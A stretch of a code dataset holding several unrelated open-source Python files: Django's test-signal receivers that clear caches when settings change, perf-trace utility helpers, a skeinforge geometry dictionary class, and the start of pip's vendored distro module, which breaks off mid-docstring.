ns_args['auth_time'] = self.auth_time
return ns_args
Response.ns_uri = ns_uri
|
bsd-3-clause
|
BassantMorsi/finderApp
|
lib/python2.7/site-packages/django/test/signals.py
|
45
|
6752
|
import os
import threading
import time
import warnings
from django.apps import apps
from django.core.exceptions import ImproperlyConfigured
from django.core.signals import setting_changed
from django.db import connections, router
from django.db.utils import ConnectionRouter
from django.dispatch import Signal, receiver
from django.utils import six, timezone
from django.utils.formats import FORMAT_SETTINGS, reset_format_cache
from django.utils.functional import empty
template_rendered = Signal(providing_args=["template", "context"])
# Most setting_changed receivers are supposed to be added below,
# except for cases where the receiver is related to a contrib app.
# Settings that may not work well when using 'override_settings' (#19031)
COMPLEX_OVERRIDE_SETTINGS = {'DATABASES'}
@receiver(setting_changed)
def clear_cache_handlers(**kwargs):
if kwargs['setting'] == 'CACHES':
from django.core.cache import caches
caches._caches = threading.local()
@receiver(setting_changed)
def update_installed_apps(**kwargs):
if kwargs['setting'] == 'INSTALLED_APPS':
# Rebuild any AppDirectoriesFinder instance.
from django.contrib.staticfiles.finders import get_finder
get_finder.cache_clear()
# Rebuild management commands cache
from django.core.management import get_commands
get_commands.cache_clear()
# Rebuild get_app_template_dirs cache.
from django.template.utils import get_app_template_dirs
get_app_template_dirs.cache_clear()
# Rebuild translations cache.
from django.utils.translation import trans_real
trans_real._translations = {}
@receiver(setting_changed)
def update_connections_time_zone(**kwargs):
if kwargs['setting'] == 'TIME_ZONE':
# Reset process time zone
if hasattr(time, 'tzset'):
if kwargs['value']:
os.environ['TZ'] = kwargs['value']
else:
os.environ.pop('TZ', None)
time.tzset()
# Reset local time zone cache
timezone.get_default_timezone.cache_clear()
# Reset the database connections' time zone
if kwargs['setting'] in {'TIME_ZONE', 'USE_TZ'}:
for conn in connections.all():
try:
del conn.timezone
except AttributeError:
pass
try:
del conn.timezone_name
except AttributeError:
pass
conn.ensure_timezone()
@receiver(setting_changed)
def clear_routers_cache(**kwargs):
if kwargs['setting'] == 'DATABASE_ROUTERS':
router.routers = ConnectionRouter().routers
@receiver(setting_changed)
def reset_template_engines(**kwargs):
if kwargs['setting'] in {
'TEMPLATES',
'DEBUG',
'FILE_CHARSET',
'INSTALLED_APPS',
}:
from django.template import engines
try:
del engines.templates
except AttributeError:
pass
engines._templates = None
engines._engines = {}
from django.template.engine import Engine
Engine.get_default.cache_clear()
from django.forms.renderers import get_default_renderer
get_default_renderer.cache_clear()
@receiver(setting_changed)
def clear_serializers_cache(**kwargs):
if kwargs['setting'] == 'SERIALIZATION_MODULES':
from django.core import serializers
serializers._serializers = {}
@receiver(setting_changed)
def language_changed(**kwargs):
if kwargs['setting'] in {'LANGUAGES', 'LANGUAGE_CODE', 'LOCALE_PATHS'}:
from django.utils.translation import trans_real
trans_real._default = None
trans_real._active = threading.local()
if kwargs['setting'] in {'LANGUAGES', 'LOCALE_PATHS'}:
from django.utils.translation import trans_real
trans_real._translations = {}
trans_real.check_for_language.cache_clear()
@receiver(setting_changed)
def localize_settings_changed(**kwargs):
if kwargs['setting'] in FORMAT_SETTINGS or kwargs['setting'] == 'USE_THOUSAND_SEPARATOR':
reset_format_cache()
@receiver(setting_changed)
def file_storage_changed(**kwargs):
if kwargs['setting'] == 'DEFAULT_FILE_STORAGE':
from django.core.files.storage import default_storage
default_storage._wrapped = empty
@receiver(setting_changed)
def complex_setting_changed(**kwargs):
if kwargs['enter'] and kwargs['setting'] in COMPLEX_OVERRIDE_SETTINGS:
# Considering the current implementation of the signals framework,
# this stacklevel shows the line containing the override_settings call.
warnings.warn("Overriding setting %s can lead to unexpected behavior."
% kwargs['setting'], stacklevel=5 if six.PY2 else 6)
@receiver(setting_changed)
def root_urlconf_changed(**kwargs):
if kwargs['setting'] == 'ROOT_URLCONF':
from django.urls import clear_url_caches, set_urlconf
clear_url_caches()
set_urlconf(None)
@receiver(setting_changed)
def static_storage_changed(**kwargs):
if kwargs['setting'] in {
'STATICFILES_STORAGE',
'STATIC_ROOT',
'STATIC_URL',
}:
from django.contrib.staticfiles.storage import staticfiles_storage
staticfiles_storage._wrapped = empty
@receiver(setting_changed)
def static_finders_changed(**kwargs):
if kwargs['setting'] in {
'STATICFILES_DIRS',
'STATIC_ROOT',
}:
from django.contrib.staticfiles.finders import get_finder
get_finder.cache_clear()
@receiver(setting_changed)
def auth_password_validators_changed(**kwargs):
if kwargs['setting'] == 'AUTH_PASSWORD_VALIDATORS':
from django.contrib.auth.password_validation import get_default_password_validators
get_default_password_validators.cache_clear()
@receiver(setting_changed)
def user_model_swapped(**kwargs):
if kwargs['setting'] == 'AUTH_USER_MODEL':
apps.clear_cache()
try:
from django.contrib.auth import get_user_model
UserModel = get_user_model()
except ImproperlyConfigured:
# Some tests set an invalid AUTH_USER_MODEL.
pass
else:
from django.contrib.auth import backends
backends.UserModel = UserModel
from django.contrib.auth import forms
forms.UserModel = UserModel
from django.contrib.auth.handlers import modwsgi
modwsgi.UserModel = UserModel
from django.contrib.auth.management.commands import changepassword
changepassword.UserModel = UserModel
from django.contrib.auth import views
views.UserModel = UserModel
|
mit
|
Krabappel2548/kernel_msm8x60
|
tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Util.py
|
12527
|
1935
|
# Util.py - Python extension for perf script, miscellaneous utility code
#
# Copyright (C) 2010 by Tom Zanussi <tzanussi@gmail.com>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import errno, os
FUTEX_WAIT = 0
FUTEX_WAKE = 1
FUTEX_PRIVATE_FLAG = 128
FUTEX_CLOCK_REALTIME = 256
FUTEX_CMD_MASK = ~(FUTEX_PRIVATE_FLAG | FUTEX_CLOCK_REALTIME)
NSECS_PER_SEC = 1000000000
def avg(total, n):
return total / n
def nsecs(secs, nsecs):
return secs * NSECS_PER_SEC + nsecs
def nsecs_secs(nsecs):
return nsecs / NSECS_PER_SEC
def nsecs_nsecs(nsecs):
return nsecs % NSECS_PER_SEC
def nsecs_str(nsecs):
str = "%5u.%09u" % (nsecs_secs(nsecs), nsecs_nsecs(nsecs)),
return str
def add_stats(dict, key, value):
if not dict.has_key(key):
dict[key] = (value, value, value, 1)
else:
min, max, avg, count = dict[key]
if value < min:
min = value
if value > max:
max = value
avg = (avg + value) / 2
dict[key] = (min, max, avg, count + 1)
def clear_term():
print("\x1b[H\x1b[2J")
audit_package_warned = False
try:
import audit
machine_to_id = {
'x86_64': audit.MACH_86_64,
'alpha' : audit.MACH_ALPHA,
'ia64' : audit.MACH_IA64,
'ppc' : audit.MACH_PPC,
'ppc64' : audit.MACH_PPC64,
's390' : audit.MACH_S390,
's390x' : audit.MACH_S390X,
'i386' : audit.MACH_X86,
'i586' : audit.MACH_X86,
'i686' : audit.MACH_X86,
}
try:
machine_to_id['armeb'] = audit.MACH_ARMEB
except:
pass
machine_id = machine_to_id[os.uname()[4]]
except:
if not audit_package_warned:
audit_package_warned = True
print "Install the audit-libs-python package to get syscall names"
def syscall_name(id):
try:
return audit.audit_syscall_to_name(id, machine_id)
except:
return str(id)
def strerror(nr):
try:
return errno.errorcode[abs(nr)]
except:
return "Unknown %d errno" % nr
|
gpl-2.0
|
Pointedstick/ReplicatorG
|
skein_engines/skeinforge-40/fabmetheus_utilities/geometry/geometry_tools/dictionary.py
|
2
|
5368
|
"""
Boolean geometry dictionary object.
"""
from __future__ import absolute_import
#Init has to be imported first because it has code to workaround the python bug where relative imports don't work if the module is imported as a main module.
import __init__
from fabmetheus_utilities.geometry.geometry_utilities import evaluate
from fabmetheus_utilities.geometry.geometry_utilities import matrix
from fabmetheus_utilities import euclidean
from fabmetheus_utilities import xml_simple_writer
import cStringIO
__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'
__credits__ = 'Nophead <http://hydraraptor.blogspot.com/>\nArt of Illusion <http://www.artofillusion.org/>'
__date__ = '$Date: 2008/21/04 $'
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
def getAllPaths(paths, xmlObject):
'Get all paths.'
for archivableObject in xmlObject.archivableObjects:
paths += archivableObject.getPaths()
return paths
def getAllTransformedPaths(transformedPaths, xmlObject):
'Get all transformed paths.'
for archivableObject in xmlObject.archivableObjects:
transformedPaths += archivableObject.getTransformedPaths()
return transformedPaths
def getAllTransformedVertexes(transformedVertexes, xmlObject):
'Get all transformed vertexes.'
for archivableObject in xmlObject.archivableObjects:
transformedVertexes += archivableObject.getTransformedVertexes()
return transformedVertexes
def getAllVertexes(vertexes, xmlObject):
'Get all vertexes.'
for archivableObject in xmlObject.archivableObjects:
vertexes += archivableObject.getVertexes()
return vertexes
def processXMLElement(xmlElement):
'Process the xml element.'
evaluate.processArchivable( Dictionary, xmlElement)
class Dictionary:
'A dictionary object.'
def __init__(self):
'Add empty lists.'
self.archivableObjects = []
self.xmlElement = None
def __repr__(self):
'Get the string representation of this object info.'
output = xml_simple_writer.getBeginGeometryXMLOutput(self.xmlElement)
self.addXML( 1, output )
return xml_simple_writer.getEndGeometryXMLString(output)
def addXML(self, depth, output):
'Add xml for this object.'
attributeCopy = {}
if self.xmlElement != None:
attributeCopy = evaluate.getEvaluatedDictionaryByCopyKeys(['paths', 'target', 'vertexes'], self.xmlElement)
euclidean.removeElementsFromDictionary(attributeCopy, matrix.getKeysM())
euclidean.removeTrueFromDictionary(attributeCopy, 'visible')
innerOutput = cStringIO.StringIO()
self.addXMLInnerSection(depth + 1, innerOutput)
self.addXMLArchivableObjects(depth + 1, innerOutput)
xml_simple_writer.addBeginEndInnerXMLTag(attributeCopy, self.getXMLClassName(), depth, innerOutput.getvalue(), output)
def addXMLArchivableObjects(self, depth, output):
'Add xml for this object.'
xml_simple_writer.addXMLFromObjects( depth, self.archivableObjects, output )
def addXMLInnerSection(self, depth, output):
'Add xml section for this object.'
pass
def createShape(self):
'Create the shape.'
pass
def getAttributeDictionary(self):
'Get attribute table.'
if self.xmlElement == None:
return {}
return self.xmlElement.attributeDictionary
def getComplexTransformedPathLists(self):
'Get complex transformed path lists.'
complexTransformedPathLists = []
for archivableObject in self.archivableObjects:
complexTransformedPathLists.append(euclidean.getComplexPaths(archivableObject.getTransformedPaths()))
return complexTransformedPathLists
def getFabricationExtension(self):
'Get fabrication extension.'
return 'xml'
def getFabricationText(self, addLayerTemplate):
'Get fabrication text.'
return self.__repr__()
def getGeometryOutput(self):
'Get geometry output dictionary.'
visibleObjects = evaluate.getVisibleObjects(self.archivableObjects)
shapeOutput = []
for visibleObject in visibleObjects:
visibleObjectOutput = visibleObject.getGeometryOutput()
if visibleObjectOutput != None:
shapeOutput.append(visibleObjectOutput)
if len(shapeOutput) < 1:
return None
return {self.getXMLClassName() : {'shapes' : shapeOutput}}
def getMatrix4X4(self):
"Get the matrix4X4."
return None
def getMatrixChainTetragrid(self):
'Get the matrix chain tetragrid.'
return self.xmlElement.parent.xmlObject.getMatrixChainTetragrid()
def getMinimumZ(self):
'Get the minimum z.'
return None
def getPaths(self):
'Get all paths.'
return getAllPaths([], self)
def getTransformedPaths(self):
'Get all transformed paths.'
return getAllTransformedPaths([], self)
def getTransformedVertexes(self):
'Get all transformed vertexes.'
return getAllTransformedVertexes([], self)
def getTriangleMeshes(self):
'Get all triangleMeshes.'
triangleMeshes = []
for archivableObject in self.archivableObjects:
triangleMeshes += archivableObject.getTriangleMeshes()
return triangleMeshes
def getType(self):
'Get type.'
return self.__class__.__name__
def getVertexes(self):
'Get all vertexes.'
return getAllVertexes([], self)
def getVisible(self):
'Get visible.'
return False
def getXMLClassName(self):
'Get xml class name.'
return self.__class__.__name__.lower()
def setToXMLElement(self, xmlElement):
'Set the shape of this carvable object info.'
self.xmlElement = xmlElement
xmlElement.parent.xmlObject.archivableObjects.append(self)
|
gpl-2.0
|
kenshay/ImageScripter
|
ProgramData/SystemFiles/Python/Lib/site-packages/pip-9.0.1-py2.7.egg/pip/_vendor/distro.py
|
330
|
38349
|
# Copyright 2015,2016 Nir Cohen
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The ``distro`` package (``distro`` stands for Linux Distribution) provides
information about the Linux distribution it runs on, such as a reliable
machine-readable distro ID, or version information.
It is a renewed alternative implementation for Python's original
:py:func:`platform.linux_distribution` function, but it provides much more
functionality. An alternative implementation became necessary because Python
3.5 deprecated this function, and Python 3.7 is expected to remove it
altogether. Its predecessor function :py:func:`platform.dist` was already
deprecated since Python 2.6 and is also expected to be removed in Python 3.7.
Still, there are many cases in which access to Linux distribution information
is needed. See `Python issue 1322 <https://bugs.python.org/issue1322>`_ for
more information.
"""
import os
import re
import sys
import json
import shlex
import logging
import subprocess
if not sys.platform.startswith('linux'):
raise ImportError('Unsupported platform: {0}'.format(sys.platform))
_UNIXCONFDIR = '/etc'
_OS_RELEASE_BASENAME = 'os-release'
#: Translation table for normalizing the "ID" attribute defined in os-release
#: files, for use by the :func:`distro.id` method.
#:
#: * Key: Value as defined in the os-release file, translated to lower case,
#: with blanks translated to underscores.
#:
#: * Value: Normalized value.
NORMALIZED_OS_ID = {}
#: Translation table for normalizing the "Distributor ID" attribute returned by
#: the lsb_release command, for use by the :func:`distro.id` method.
#:
#: * Key: Value as returned by the lsb_release command, translated to lower
#: case, with blanks translated to underscores.
#:
#: * Value: Normalized value.
NORMALIZED_LSB_ID = {
'enterpriseenterprise': 'oracle', # Oracle Enterprise Linux
'redhatenterpriseworkstation': 'rhel', # RHEL 6.7
}
#: Translation table for normalizing the distro ID derived from the file name
#: of distro release files, for use by the :func:`distro.id` method.
#:
#: * Key: Value as derived from the file name of a distro release file,
#: translated to lower case, with blanks translated to underscores.
#:
#: * Value: Normalized value.
NORMALIZED_DISTRO_ID = {
'redhat': 'rhel', # RHEL 6.x, 7.x
}
# Pattern for content of distro release file (reversed)
_DISTRO_RELEASE_CONTENT_REVERSED_PATTERN = re.compile(
r'(?:[^)]*\)(.*)\()? *(?:STL )?([\d.+\-a-z]*\d) *(?:esaeler *)?(.+)')
# Pattern for base file name of distro release file
_DISTRO_RELEASE_BASENAME_PATTERN = re.compile(
r'(\w+)[-_](release|version)$')
# Base file names to be ignored when searching for distro release file
_DISTRO_RELEASE_IGNORE_BASENAMES = (
'debian_version',
'lsb-release',
'oem-release',
_OS_RELEASE_BASENAME,
'system-release'
)
def linux_distribution(full_distribution_name=True):
"""
Return information about the current Linux distribution as a tuple
``(id_name, version, codename)`` with items as follows:
* ``id_name``: If *full_distribution_name* is false, the result of
:func:`distro.id`. Otherwise, the result of :func:`distro.name`.
* ``version``: The result of :func:`distro.version`.
* ``codename``: The result of :func:`distro.codename`.
The interface of this function is compatible with the original
:py:func:`platform.linux_distribution` function, supporting a subset of
its parameters.
The data it returns may not exactly be the same, because it uses more data
sources than the original function, and that may lead to different data if
the Linux distribution is not consistent across multiple data sources it
provides (there are indeed such distributions ...).
Another reason for differences is the fact that the :func:`distro.id`
method normalizes the distro ID string to a reliable machine-readable value
for a number of popular Linux distributions.
"""
return _distro.linux_distribution(full_distribution_name)
def id():
"""
Return the distro ID of the current Linux distribution, as a
machine-readable string.
For a number of Linux distributions, the returned distro ID value is
*reliable*, in the sense that it is documented and that it does not change
across releases of the distribution.
This package maintains the following reliable distro ID values:
============== =========================================
Distro ID Distribution
============== =========================================
"ubuntu" Ubuntu
"debian" Debian
"rhel" RedHat Enterprise Linux
"centos" CentOS
"fedora" Fedora
"sles" SUSE Linux Enterprise Server
"opensuse" openSUSE
"amazon" Amazon Linux
"arch" Arch Linux
"cloudlinux" CloudLinux OS
"exherbo" Exherbo Linux
"gentoo" GenToo Linux
"ibm_powerkvm" IBM PowerKVM
"kvmibm" KVM for IBM z Systems
"linuxmint" Linux Mint
"mageia" Mageia
"mandriva" Mandriva Linux
"parallels" Parallels
"pidora" Pidora
"raspbian" Raspbian
"oracle" Oracle Linux (and Oracle Enterprise Linux)
"scientific" Scientific Linux
"slackware" Slackware
"xenserver" XenServer
============== =========================================
If you have a need to get distros for reliable IDs added into this set,
or if you find that the :func:`distro.id` function returns a different
distro ID for one of the listed distros, please create an issue in the
`distro issue tracker`_.
**Lookup hierarchy and transformations:**
First, the ID is obtained from the following sources, in the specified
order. The first available and non-empty value is used:
* the value of the "ID" attribute of the os-release file,
* the value of the "Distributor ID" attribute returned by the lsb_release
command,
* the first part of the file name of the distro release file,
The so determined ID value then passes the following transformations,
before it is returned by this method:
* it is translated to lower case,
* blanks (which should not be there anyway) are translated to underscores,
* a normalization of the ID is performed, based upon
`normalization tables`_. The purpose of this normalization is to ensure
that the ID is as reliable as possible, even across incompatible changes
in the Linux distributions. A common reason for an incompatible change is
the addition of an os-release file, or the addition of the lsb_release
command, with ID values that differ from what was previously determined
from the distro release file name.
"""
return _distro.id()
def name(pretty=False):
"""
Return the name of the current Linux distribution, as a human-readable
string.
If *pretty* is false, the name is returned without version or codename.
(e.g. "CentOS Linux")
If *pretty* is true, the version and codename are appended.
(e.g. "CentOS Linux 7.1.1503 (Core)")
**Lookup hierarchy:**
The name is obtained from the following sources, in the specified order.
The first available and non-empty value is used:
* If *pretty* is false:
- the value of the "NAME" attribute of the os-release file,
- the value of the "Distributor ID" attribute returned by the lsb_release
command,
- the value of the "<name>" field of the distro release file.
* If *pretty* is true:
- the value of the "PRETTY_NAME" attribute of the os-release file,
- the value of the "Description" attribute returned by the lsb_release
command,
- the value of the "<name>" field of the distro release file, appended
with the value of the pretty version ("<version_id>" and "<codename>"
fields) of the distro release file, if available.
"""
return _distro.name(pretty)
def version(pretty=False, best=False):
"""
Return the version of the current Linux distribution, as a human-readable
string.
If *pretty* is false, the version is returned without codename (e.g.
"7.0").
If *pretty* is true, the codename in parenthesis is appended, if the
codename is non-empty (e.g. "7.0 (Maipo)").
Some distributions provide version numbers with different precisions in
the different sources of distribution information. Examining the different
sources in a fixed priority order does not always yield the most precise
version (e.g. for Debian 8.2, or CentOS 7.1).
The *best* parameter can be used to control the approach for the returned
version:
If *best* is false, the first non-empty version number in priority order of
the examined sources is returned.
If *best* is true, the most precise version number out of all examined
sources is returned.
**Lookup hierarchy:**
In all cases, the version number is obtained from the following sources.
If *best* is false, this order represents the priority order:
* the value of the "VERSION_ID" attribute of the os-release file,
* the value of the "Release" attribute returned by the lsb_release
command,
* the version number parsed from the "<version_id>" field of the first line
of the distro release file,
* the version number parsed from the "PRETTY_NAME" attribute of the
os-release file, if it follows the format of the distro release files.
* the version number parsed from the "Description" attribute returned by
the lsb_release command, if it follows the format of the distro release
files.
"""
return _distro.version(pretty, best)
def version_parts(best=False):
"""
Return the version of the current Linux distribution as a tuple
``(major, minor, build_number)`` with items as follows:
* ``major``: The result of :func:`distro.major_version`.
* ``minor``: The result of :func:`distro.minor_version`.
* ``build_number``: The result of :func:`distro.build_number`.
For a description of the *best* parameter, see the :func:`distro.version`
method.
"""
return _distro.version_parts(best)
def major_version(best=False):
"""
Return the major version of the current Linux distribution, as a string,
if provided.
Otherwise, the empty string is returned. The major version is the first
part of the dot-separated version string.
For a description of the *best* parameter, see the :func:`distro.version`
method.
"""
return _distro.major_version(best)
def minor_version(best=False):
"""
Return the minor version of the current Linux distribution, as a string,
if provided.
Otherwise, the empty string is returned. The minor version is the second
part of the dot-separated version string.
For a description of the *best* parameter, see the :func:`distro.version`
method.
"""
return _distro.minor_version(best)
def build_number(best=False):
"""
Return the build number of the current Linux distribution, as a string,
if provided.
Otherwise, the empty string is returned. The build number is the third part
of the dot-separated version string.
For a description of the *best* parameter, see the :func:`distro.version`
method.
"""
return _distro.build_number(best)
def like():
"""
Return a space-separated list of distro IDs of distributions that are
closely related to the current Linux distribution in regards to packaging
and programming interfaces, for example distributions the current
distribution is a derivative from.
**Lookup hierarchy:**
This information item is only provided by the os-release file.
For details, see the description of the "ID_LIKE" attribute in the
`os-release man page
<http://www.freedesktop.org/software/systemd/man/os-release.html>`_.
"""
return _distro.like()
def codename():
"""
Return the codename for the release of the current Linux distribution,
as a string.
If the distribution does not have a codename, an empty string is returned.
Note that the returned codename is not always really a codename. For
example, openSUSE returns "x86_64". This function does not handle such
cases in any special way and just returns the string it finds, if any.
**Lookup hierarchy:**
* the codename within the "VERSION" attribute of the os-release file, if
provided,
* the value of the "Codename" attribute returned by the lsb_release
command,
* the value of the "<codename>" field of the distro release file.
"""
return _distro.codename()
def info(pretty=False, best=False):
"""
Return certain machine-readable information items about the current Linux
distribution in a dictionary, as shown in the following example:
.. sourcecode:: python
{
'id': 'rhel',
'version': '7.0',
'version_parts': {
'major': '7',
'minor': '0',
'build_number': ''
},
'like': 'fedora',
'codename': 'Maipo'
}
The dictionary structure and keys are always the same, regardless of which
information items are available in the underlying data sources. The values
for the various keys are as follows:
* ``id``: The result of :func:`distro.id`.
* ``version``: The result of :func:`distro.version`.
* ``version_parts -> major``: The result of :func:`distro.major_version`.
* ``version_parts -> minor``: The result of :func:`distro.minor_version`.
* ``version_parts -> build_number``: The result of
:func:`distro.build_number`.
* ``like``: The result of :func:`distro.like`.
* ``codename``: The result of :func:`distro.codename`.
For a description of the *pretty* and *best* parameters, see the
:func:`distro.version` method.
"""
return _distro.info(pretty, best)
def os_release_info():
"""
Return a dictionary containing key-value pairs for the information items
from the os-release file data source of the current Linux distribution.
See `os-release file`_ for details about these information items.
"""
return _distro.os_release_info()
def lsb_release_info():
"""
Return a dictionary containing key-value pairs for the information items
from the lsb_release command data source of the current Linux distribution.
See `lsb_release command output`_ for details about these information
items.
"""
return _distro.lsb_release_info()
def distro_release_info():
"""
Return a dictionary containing key-value pairs for the information items
from the distro release file data source of the current Linux distribution.
See `distro release file`_ for details about these information items.
"""
return _distro.distro_release_info()
def os_release_attr(attribute):
"""
Return a single named information item from the os-release file data source
of the current Linux distribution.
Parameters:
* ``attribute`` (string): Key of the information item.
Returns:
* (string): Value of the information item, if the item exists.
The empty string, if the item does not exist.
See `os-release file`_ for details about these information items.
"""
return _distro.os_release_attr(attribute)
def lsb_release_attr(attribute):
"""
Return a single named information item from the lsb_release command output
data source of the current Linux distribution.
Parameters:
* ``attribute`` (string): Key of the information item.
Returns:
* (string): Value of the information item, if the item exists.
The empty string, if the item does not exist.
See `lsb_release command output`_ for details about these information
items.
"""
return _distro.lsb_release_attr(attribute)
def distro_release_attr(attribute):
"""
Return a single named information item from the distro release file
data source of the current Linux distribution.
Parameters:
* ``attribute`` (string): Key of the information item.
Returns:
* (string): Value of the information item, if the item exists.
The empty string, if the item does not exist.
See `distro release file`_ for details about these information items.
"""
return _distro.distro_release_attr(attribute)
class LinuxDistribution(object):
"""
Provides information about a Linux distribution.
This package creates a private module-global instance of this class with
default initialization arguments, that is used by the
`consolidated accessor functions`_ and `single source accessor functions`_.
By using default initialization arguments, that module-global instance
returns data about the current Linux distribution (i.e. the distro this
package runs on).
Normally, it is not necessary to create additional instances of this class.
However, in situations where control is needed over the exact data sources
that are used, instances of this class can be created with a specific
distro release file, or a specific os-release file, or without invoking the
lsb_release command.
"""
def __init__(self,
include_lsb=True,
os_release_file='',
distro_release_file=''):
"""
The initialization method of this class gathers information from the
available data sources, and stores that in private instance attributes.
Subsequent access to the information items uses these private instance
attributes, so that the data sources are read only once.
Parameters:
* ``include_lsb`` (bool): Controls whether the
`lsb_release command output`_ is included as a data source.
If the lsb_release command is not available in the program execution
path, the data source for the lsb_release command will be empty.
* ``os_release_file`` (string): The path name of the
`os-release file`_ that is to be used as a data source.
An empty string (the default) will cause the default path name to
be used (see `os-release file`_ for details).
If the specified or defaulted os-release file does not exist, the
data source for the os-release file will be empty.
* ``distro_release_file`` (string): The path name of the
`distro release file`_ that is to be used as a data source.
An empty string (the default) will cause a default search algorithm
to be used (see `distro release file`_ for details).
If the specified distro release file does not exist, or if no default
distro release file can be found, the data source for the distro
release file will be empty.
Public instance attributes:
* ``os_release_file`` (string): The path name of the
`os-release file`_ that is actually used as a data source. The
empty string if no distro release file is used as a data source.
* ``distro_release_file`` (string): The path name of the
`distro release file`_ that is actually used as a data source. The
empty string if no distro release file is used as a data source.
Raises:
* :py:exc:`IOError`: Some I/O issue with an os-release file or distro
release file.
* :py:exc:`subprocess.CalledProcessError`: The lsb_release command had
some issue (other than not being available in the program execution
path).
* :py:exc:`UnicodeError`: A data source has unexpected characters or
uses an unexpected encoding.
"""
self.os_release_file = os_release_file or \
os.path.join(_UNIXCONFDIR, _OS_RELEASE_BASENAME)
self.distro_release_file = distro_release_file or '' # updated later
self._os_release_info = self._get_os_release_info()
self._lsb_release_info = self._get_lsb_release_info() \
if include_lsb else {}
self._distro_release_info = self._get_distro_release_info()
def __repr__(self):
"""Return repr of all info
"""
return \
"LinuxDistribution(" \
"os_release_file={0!r}, " \
"distro_release_file={1!r}, " \
"_os_release_info={2!r}, " \
"_lsb_release_info={3!r}, " \
"_distro_release_info={4!r})".format(
self.os_release_file,
self.distro_release_file,
self._os_release_info,
self._lsb_release_info,
self._distro_release_info)
def linux_distribution(self, full_distribution_name=True):
"""
Return information about the Linux distribution that is compatible
with Python's :func:`platform.linux_distribution`, supporting a subset
of its parameters.
For details, see :func:`distro.linux_distribution`.
"""
return (
self.name() if full_distribution_name else self.id(),
self.version(),
self.codename()
)
def id(self):
"""Return the distro ID of the Linux distribution, as a string.
For details, see :func:`distro.id`.
"""
def normalize(distro_id, table):
distro_id = distro_id.lower().replace(' ', '_')
return table.get(distro_id, distro_id)
distro_id = self.os_release_attr('id')
if distro_id:
return normalize(distro_id, NORMALIZED_OS_ID)
distro_id = self.lsb_release_attr('distributor_id')
if distro_id:
return normalize(distro_id, NORMALIZED_LSB_ID)
distro_id = self.distro_release_attr('id')
if distro_id:
return normalize(distro_id, NORMALIZED_DISTRO_ID)
return ''
def name(self, pretty=False):
"""
Return the name of the Linux distribution, as a string.
For details, see :func:`distro.name`.
"""
name = self.os_release_attr('name') \
or self.lsb_release_attr('distributor_id') \
or self.distro_release_attr('name')
if pretty:
name = self.os_release_attr('pretty_name') \
or self.lsb_release_attr('description')
if not name:
name = self.distro_release_attr('name')
version = self.version(pretty=True)
if version:
name = name + ' ' + version
return name or ''
def version(self, pretty=False, best=False):
"""
Return the version of the Linux distribution, as a string.
For details, see :func:`distro.version`.
"""
versions = [
self.os_release_attr('version_id'),
self.lsb_release_attr('release'),
self.distro_release_attr('version_id'),
self._parse_distro_release_content(
self.os_release_attr('pretty_name')).get('version_id', ''),
self._parse_distro_release_content(
self.lsb_release_attr('description')).get('version_id', '')
]
version = ''
if best:
# This algorithm uses the last version in priority order that has
# the best precision. If the versions are not in conflict, that
# does not matter; otherwise, using the last one instead of the
# first one might be considered a surprise.
for v in versions:
if v.count(".") > version.count(".") or version == '':
version = v
else:
for v in versions:
if v != '':
version = v
break
if pretty and version and self.codename():
version = u'{0} ({1})'.format(version, self.codename())
return version
def version_parts(self, best=False):
"""
Return the version of the Linux distribution, as a tuple of version
numbers.
For details, see :func:`distro.version_parts`.
"""
version_str = self.version(best=best)
if version_str:
version_regex = re.compile(r'(\d+)\.?(\d+)?\.?(\d+)?')
matches = version_regex.match(version_str)
if matches:
major, minor, build_number = matches.groups()
return major, minor or '', build_number or ''
return '', '', ''
def major_version(self, best=False):
"""
Return the major version number of the current distribution.
For details, see :func:`distro.major_version`.
"""
return self.version_parts(best)[0]
def minor_version(self, best=False):
"""
Return the minor version number of the Linux distribution.
For details, see :func:`distro.minor_version`.
"""
return self.version_parts(best)[1]
def build_number(self, best=False):
"""
Return the build number of the Linux distribution.
For details, see :func:`distro.build_number`.
"""
return self.version_parts(best)[2]
def like(self):
"""
Return the IDs of distributions that are like the Linux distribution.
For details, see :func:`distro.like`.
"""
return self.os_release_attr('id_like') or ''
def codename(self):
"""
Return the codename of the Linux distribution.
For details, see :func:`distro.codename`.
"""
return self.os_release_attr('codename') \
or self.lsb_release_attr('codename') \
or self.distro_release_attr('codename') \
or ''
def info(self, pretty=False, best=False):
"""
Return certain machine-readable information about the Linux
distribution.
For details, see :func:`distro.info`.
"""
return dict(
id=self.id(),
version=self.version(pretty, best),
version_parts=dict(
major=self.major_version(best),
minor=self.minor_version(best),
build_number=self.build_number(best)
),
like=self.like(),
codename=self.codename(),
)
def os_release_info(self):
"""
Return a dictionary containing key-value pairs for the information
items from the os-release file data source of the Linux distribution.
For details, see :func:`distro.os_release_info`.
"""
return self._os_release_info
def lsb_release_info(self):
"""
Return a dictionary containing key-value pairs for the information
items from the lsb_release command data source of the Linux
distribution.
For details, see :func:`distro.lsb_release_info`.
"""
return self._lsb_release_info
def distro_release_info(self):
"""
Return a dictionary containing key-value pairs for the information
items from the distro release file data source of the Linux
distribution.
For details, see :func:`distro.distro_release_info`.
"""
return self._distro_release_info
def os_release_attr(self, attribute):
"""
Return a single named information item from the os-release file data
source of the Linux distribution.
For details, see :func:`distro.os_release_attr`.
"""
return self._os_release_info.get(attribute, '')
def lsb_release_attr(self, attribute):
"""
Return a single named information item from the lsb_release command
output data source of the Linux distribution.
For details, see :func:`distro.lsb_release_attr`.
"""
return self._lsb_release_info.get(attribute, '')
def distro_release_attr(self, attribute):
"""
Return a single named information item from the distro release file
data source of the Linux distribution.
For details, see :func:`distro.distro_release_attr`.
"""
return self._distro_release_info.get(attribute, '')
def _get_os_release_info(self):
"""
Get the information items from the specified os-release file.
Returns:
A dictionary containing all information items.
"""
if os.path.isfile(self.os_release_file):
with open(self.os_release_file) as release_file:
return self._parse_os_release_content(release_file)
return {}
@staticmethod
def _parse_os_release_content(lines):
"""
Parse the lines of an os-release file.
Parameters:
